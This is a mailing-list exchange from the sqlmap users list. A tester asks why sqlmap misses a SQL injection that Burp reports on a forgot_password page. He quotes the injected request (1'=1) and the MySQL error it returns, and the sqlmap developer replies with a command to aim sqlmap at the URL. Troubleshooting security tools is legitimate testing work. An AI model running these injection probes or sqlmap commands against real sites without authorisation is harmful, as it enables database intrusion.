Re: [sqlmap-users] Tweaking SQLMap Config
From: Miroslav S. <mir...@gm...> - 2012-06-05 21:45:37
Hi Chris.

This all looks kind of strange. At your place I would try running sqlmap against:

./sqlmap.py -u "www.target.com/forgot_password.html?1*"

Putting that 1'=1 looks to me like a big no no (if you take a good look into the response you'll see for yourself that putting it does not make any sense).

If everything fails, please send me a traffic file for that run I've proposed in upper lines.

Kind regards,
Miroslav Stampar

On Tue, Jun 5, 2012 at 10:04 PM, Chris Rowe <pip...@gm...> wrote:

> Hey guys, frustration is the name of the game. I have burp pro telling me
> that it is a definite sql injection, but I cannot get sqlmap to find an
> injection point. I have tried adding a * where the single quote is, using
> the ?1 as prefix and =1 as suffix, and tuning the level and risk. I tried
> loading the entire request into a file for sqlmap. If I add 2 quotes the
> error goes away. Burp added the name of an arbitrarily supplied request
> parameter where the highlight is. Check out this request and response.
>
> GET /forgot_password.html?1'=1 HTTP/1.1
> Host: XXXX.XXXXXXXX.com
> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101
> Firefox/12.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-us,en;q=0.5
> Accept-Encoding: gzip, deflate
> DNT: 1
> Referer: https://XXXXX.XXXXX.com/
> Connection: keep-alive
> Cache-Control: max-age=0
>
> HTTP/1.1 200 OK
> Date: Tue, 05 Jun 2012 19:26:42 GMT
> Server: Apache/2.2.3 (CentOS)
> X-Powered-By: PHP/5.1.6
> Content-Length: 385
> Connection: close
> Content-Type: text/html; charset=UTF-8
>
> Error in query: SELECT id from flag WHERE url='
> https://XXXXX.XXXXX.com/forgot_password.html?1'=1' AND author_id='' AND
> active='y' ORDER BY date_last_modified DESC, You have an error in your SQL
> syntax; check the manual that corresponds to your MySQL server version for
> the right syntax to use near '' AND author_id='' AND active='y' ORDER BY
> date_last_modified DESC' at line 1

--
Miroslav Stampar
http://about.me/stamparm